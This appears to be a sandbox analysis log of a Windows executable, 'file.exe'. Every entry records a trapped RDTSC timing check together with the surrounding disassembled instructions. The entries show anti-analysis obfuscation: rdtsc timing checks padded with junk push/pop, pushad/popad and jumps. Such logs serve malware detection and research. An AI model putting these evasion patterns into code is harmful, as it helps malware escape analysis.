Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A540BE second address: A540C8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F661D45143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A540C8 second address: A540D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jbe 00007F661CE75E86h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A594AC second address: A594C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D451440h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A595D7 second address: A595DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5967E second address: A59683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59683 second address: A59696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E8Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59696 second address: A5969A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5969A second address: A596C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007F661CE75E92h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jng 00007F661CE75E92h 0x00000019 je 00007F661CE75E8Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FD05 second address: A5FD09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FD09 second address: A5FD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5EAF4 second address: A5EB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F661D451441h 0x0000000c jmp 00007F661D45143Bh 0x00000011 pop edx 0x00000012 push ecx 0x00000013 pushad 0x00000014 jp 00007F661D451436h 0x0000001a je 00007F661D451436h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F661D45143Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F0D6 second address: A5F0DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F243 second address: A5F247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F77C second address: A5F785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F785 second address: A5F790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F661D451436h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F790 second address: A5F796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F8E5 second address: A5F8F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F8F0 second address: A5F8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F8F4 second address: A5F8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F8F8 second address: A5F8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FA2C second address: A5FA30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FA30 second address: A5FA52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E97h 0x00000007 pushad 0x00000008 jg 00007F661CE75E86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FB71 second address: A5FB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 jbe 00007F661D451436h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A62F66 second address: A62F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A69191 second address: A691A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D45143Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A67EFB second address: A67F57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E96h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 je 00007F661CE75EA5h 0x00000017 jmp 00007F661CE75E99h 0x0000001c je 00007F661CE75E86h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F661CE75E93h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D68F second address: A6D693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D693 second address: A6D699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D699 second address: A6D6B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451445h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6DDB4 second address: A6DDBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6DDBA second address: A6DDC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6DDC3 second address: A6DDC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6E1D2 second address: A6E1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6E307 second address: A6E30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76DF5 second address: A76E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 jo 00007F661D451436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F661D451448h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76E28 second address: A76E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76E2E second address: A76E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76E32 second address: A76E43 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007F661CE75E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A75C7D second address: A75C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A75C89 second address: A75CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E93h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F661CE75E8Bh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A31683 second address: A31687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A31687 second address: A3168C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A318C1 second address: A318C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A31CC9 second address: A31CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A31EC7 second address: A31EF2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661D451438h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jnc 00007F661D451440h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 push ecx 0x0000001a push edi 0x0000001b pop edi 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A31FDA second address: A31FED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A31FED second address: A32007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32007 second address: A3200C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76102 second address: A76124 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F661D451436h 0x00000008 jnl 00007F661D451436h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F661D45143Eh 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76124 second address: A7612C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7612C second address: A7614D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D451444h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7614D second address: A76151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76151 second address: A76180 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F661D451436h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F661D45144Eh 0x00000012 jmp 00007F661D451448h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76434 second address: A76454 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F661CE75E92h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F661CE75E86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76454 second address: A7646E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F661D451442h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76838 second address: A76840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76840 second address: A76846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76984 second address: A76993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F661CE75E86h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76993 second address: A7699D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7699D second address: A769A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A769A1 second address: A769A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F77A7 second address: 9F77B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F661CE75E88h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F77B5 second address: 9F77E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F661D45143Fh 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push ecx 0x0000000c ja 00007F661D451436h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F661D45143Ah 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F77E7 second address: 9F77EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BD3D second address: A7BD77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F661D451438h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 jnl 00007F661D451436h 0x00000018 jc 00007F661D451436h 0x0000001e pop ebx 0x0000001f ja 00007F661D451442h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7BD77 second address: A7BD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7FA56 second address: A7FA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A80FA1 second address: A80FAB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A85B77 second address: A85B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8541C second address: A85430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E8Eh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A85430 second address: A85445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89E9F second address: A89EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F661CE75E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89EA9 second address: A89EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89EAD second address: A89EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jc 00007F661CE75E86h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89EC0 second address: A89ECA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32353 second address: A32358 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A5EA second address: A8A5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A7A3 second address: A8A7C7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F661CE75E92h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A7C7 second address: A8A7D7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F661D451436h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A7D7 second address: A8A7DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8DB10 second address: A8DB14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8DB14 second address: A8DB2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F661CE75E8Eh 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8DC8A second address: A8DCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D451447h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F661D451442h 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8DCBD second address: A8DCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F661CE75E86h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8DE36 second address: A8DE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8DE3B second address: A8DE46 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007F661CE75E86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8E1A4 second address: A8E1AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F661D451436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A95B77 second address: A95B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 jc 00007F661CE75E86h 0x0000000e jo 00007F661CE75E86h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A95B90 second address: A95BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D451442h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A93AF3 second address: A93AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A93AF7 second address: A93B26 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F661D451446h 0x00000011 jmp 00007F661D45143Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A93B26 second address: A93B30 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A93B30 second address: A93B35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A93B35 second address: A93B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F661CE75E97h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007F661CE75E9Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F661CE75E8Dh 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A93D01 second address: A93D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A93D05 second address: A93D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F661CE75E86h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94053 second address: A94057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94057 second address: A9405D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9405D second address: A94067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F661D451436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9433D second address: A94341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94F6A second address: A94F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94F70 second address: A94F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E8Fh 0x00000009 rdtsc
